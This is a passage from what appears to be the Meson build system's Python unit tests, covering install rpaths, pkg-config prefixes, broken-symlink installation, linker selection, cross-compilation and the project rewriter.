self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not (is_osx() or is_linux()):
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
if not is_osx():
# Rest of the workflow only works on macOS
return
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
@skipIfNoPkgconfig
def test_usage_pkgconfig_prefixes(self):
'''
Build and install two external libraries, to different prefixes,
then build and install a client program that finds them via pkgconfig,
and verify the installed client program runs.
'''
oldinstalldir = self.installdir
# Build and install both external libraries without DESTDIR
val1dir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'val1')
val1prefix = os.path.join(oldinstalldir, 'val1')
self.prefix = val1prefix
self.installdir = val1prefix
self.init(val1dir)
self.build()
self.install(use_destdir=False)
self.new_builddir()
env1 = {}
env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig')
val2dir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'val2')
val2prefix = os.path.join(oldinstalldir, 'val2')
self.prefix = val2prefix
self.installdir = val2prefix
self.init(val2dir, override_envvars=env1)
self.build()
self.install(use_destdir=False)
self.new_builddir()
# Build, install, and run the client program
env2 = {}
env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig')
testdir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'client')
testprefix = os.path.join(oldinstalldir, 'client')
self.prefix = testprefix
self.installdir = testprefix
self.init(testdir, override_envvars=env2)
self.build()
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'client')
env3 = {}
if is_cygwin():
env3['PATH'] = os.path.join(val1prefix, 'bin') + \
os.pathsep + \
os.path.join(val2prefix, 'bin') + \
os.pathsep + os.environ['PATH']
out = self._run([prog], override_envvars=env3).strip()
# Expected output is val1 + val2 = 3
self.assertEqual(out, '3')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
linker = cc.linker
if not linker.export_dynamic_args(env):
raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py')))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '74 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def test_no_rpath_for_static(self):
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertIsNone(build_rpath)
def test_lookup_system_after_broken_fallback(self):
# Just to generate libfoo.pc so we can test system dependency lookup.
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir = self.privatedir
# Write test project where the first dependency() returns not-found
# because 'broken' subproject does not exit, but that should not prevent
# the 2nd dependency() to lookup on system.
self.new_builddir()
with tempfile.TemporaryDirectory() as d:
with open(os.path.join(d, 'meson.build'), 'w') as f:
f.write(textwrap.dedent('''\
project('test')
dependency('notfound', fallback: 'broken', required: false)
dependency('libfoo', fallback: 'broken', required: true)
'''))
self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir})
class BaseLinuxCrossTests(BasePlatformTests):
# Don't pass --libdir when cross-compiling. We have tests that
# check whether meson auto-detects it correctly.
libdir = None
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '78 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
self.assertTrue(False, 'Libdir specified on command line gets reset.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
